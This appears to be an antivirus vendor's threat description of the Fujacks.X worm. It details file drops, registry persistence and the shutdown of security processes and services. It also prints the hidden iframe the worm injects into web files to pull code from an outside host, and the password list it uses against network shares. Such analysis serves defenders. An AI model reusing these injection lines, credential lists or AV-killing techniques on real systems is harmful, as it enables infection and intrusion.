Virus:Worm/Fujacks.X
Date discovered:09/02/2007
Type:Worm
In the wild:Yes
Reported Infections:Low
Distribution Potential:Medium
Damage Potential:Medium
Static file:Yes
File size:118.272 Bytes
MD5 checksum:9d0Ceb2ef643a2f326dfcd8265502ce9
IVDF version:6.37.01.66 - Friday, February 9, 2007

 General Method of propagation:
   • Local network
   • Mapped network drives


Aliases:
   •  Mcafee: W32/Fujacks.h
   •  Kaspersky: Worm.Win32.Fujack.a
   •  F-Secure: Worm.Win32.Fujack.a
   •  Sophos: W32/Fujacks-AJ
   •  Panda: W32/Radoppan.I.drp
   •  Grisoft: Worm/Generic.ANX
   •  Eset: Win32/Fujacks
   •  Bitdefender: Win32.Worm.Fujacks.X


Platforms / OS:
   • Windows 95
   • Windows 98
   • Windows 98 SE
   • Windows NT
   • Windows ME
   • Windows 2000
   • Windows XP
   • Windows 2003


Side effects:
   • Disable security applications
   • Downloads files
   • Drops files
   • Lowers security settings
   • Registry modification

 Files It copies itself to the following locations:
   • %SYSDIR%\drivers\CTFMONT.exe
   • %drive%\setup.exe



Sections are added to the following files.
– To: %all directories%\*.htm With the following contents:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe

– To: %all directories%\*.html With the following contents:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe

– To: %all directories%\*.asp With the following contents:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe

– To: %all directories%\*.php With the following contents:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe

– To: %all directories%\*.jsp With the following contents:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe

– To: %all directories%\*.asp With the following contents:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe




The following files are created:

– Non malicious file:
   • %SYSDIR%\SVKP.sys

%all directories%\Desktop_.ini This is a non malicious text file with the following content:
   • %current date%

%drive%\autorun.inf This is a non malicious text file with the following content:
   • %code that runs malware%




It tries to download a file:

– The location is the following:
   • http://www.ctv163.com/**********/down.txt
This file may contain further download locations and might serve as source for new threats.

 Registry The following registry key is continuously in an infinite loop added in order to run the process after reboot.

–  [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   • svcshare = %SYSDIR%\drivers\CTMONTv.exe



The values of the following registry key are removed:

–  [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   • RavTask
   • KvMonXP
   • kav
   • KAVPersonal50
   • McAfeeUpdaterUI
   • Network Associates Error Reporting Service
   • ShStatEXE
   • YLive.exe
   • yassistse



The following registry key is changed:

Various Explorer settings:
– [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
   Folder\Hidden\SHOWALL]
   Old value:
   • CheckedValue = %user defined settings%
   New value:
   • CheckedValue = 0

 Network Infection In order to ensure its propagation the malware attemps to connect to other machines as described below.


It uses the following login information in order to gain access to the remote machine:

– The following list of usernames:
   • Administrator
   • Guest
   • admin
   • Root

– The following list of passwords:
   • 1234; password; 6969; harley; 123456; golf; pussy; mustang; 1111;
      shadow; 1313; fish; 5150; 7777; qwerty; baseball; 2112; letmein;
      12345678; 12345; ccc; admin; 5201314; qq520; 123; 1234567; 123456789;
      654321; 54321; 111; 000000; abc; 11111111; 88888888; pass; passwd;
      database; abcd; abc123; sybase; 123qwe; server; computer; 520; super;
      123asd; ihavenopass; godblessyou; enable; 2002; 2003; 2600; alpha;
      110; 111111; 121212; 123123; 1234qwer; 123abc; 007; aaa; patrick; pat;
      administrator; root; sex; god; fuckyou; fuck; test; test123; temp;
      temp123; win; asdf; pwd; qwer; yxcv; zxcv; home; xxx; owner; login;
      Login; pw123; love; mypc; mypc123; admin123; mypass; mypass123; 901100



IP address generation:
It creates random IP addresses while it keeps the first three octets from its own address. Afterwards it tries to establish a connection with the created addresses.


Infection process:
The downloaded file is stored on the compromised machine as: %all shared folders%\GameSetup.exe


Slow down:
– It creates the following number of infection threads: 10
– Depending on your bandwidth you might notice a fall in your network speed. As the network activity for this malware is medium you might not take notice of this if you have a broadband connection.
– You might also note a slight slow down due to the multiple network threads created.

 Process termination List of processes that are terminated:
   • Mcshield.exe; VsTskMgr.exe; naPrdMgr.exe; UpdaterUI.exe; TBMon.exe;
      scan32.exe; Ravmond.exe; CCenter.exe; RavTask.exe; Rav.exe;
      Ravmon.exe; RavmonD.exe; RavStub.exe; KVXP.kxp; KvMonXP.kxp;
      KVCenter.kxp; KVSrvXP.exe; KRegEx.exe; UIHost.exe; TrojDie.kxp;
      FrogAgent.exe; Logo1_.exe; Logo_1.exe; Rundl132.exe

Processes containing one of the following window titles are terminated:
   • Symantec AntiVirus
   • Duba
   • Windows
   • esteem procs
   • System Safety Monitor
   • Wrapped gift Killer
   • Winsock Expert


List of services that are disabled:
   • sharedaccess; RsCCenter; RsRavMon; RsCCenter; RsRavMon; KVWSC;
      KVSrvXP; KVWSC; KVSrvXP; AVP; kavsvc; McAfeeFramework; McShield;
      McTaskManager; McAfeeFramework; McShield; McTaskManager; navapsvc;
      wscsvc; KPfwSvc; SNDSrvc; ccProxy; ccEvtMgr; ccSetMgr; SPBBCSvc;
      Symantec Core LC; NPFMntor; MskService; FireSvc

 Miscellaneous Anti debugging
It checks if one of the following files are present:
   • \\.\TRW
   • \\.\SICE
   • \\.\NTICE
   • \\.\FILEVXD
   • \\.\FILEMON
   • \\.\REGVXD
   • \\.\REGMON

If it was successful it displays the following and terminates immediately:


 File details Programming language:
 The malware program was written in Delphi.


Runtime packer:
In order to aggravate detection and reduce size of the file it is packed with the following runtime packer:
   • SVKP

Description inserted by Andrei Gherman on Thursday, October 18, 2007
Description updated by Andrei Gherman on Thursday, October 18, 2007

Back . . . .
 
 
 
 

© 2013 Avira Operations GmbH & Co. KG. All rights reserved.

My Account

https:// This window is encrypted for your security.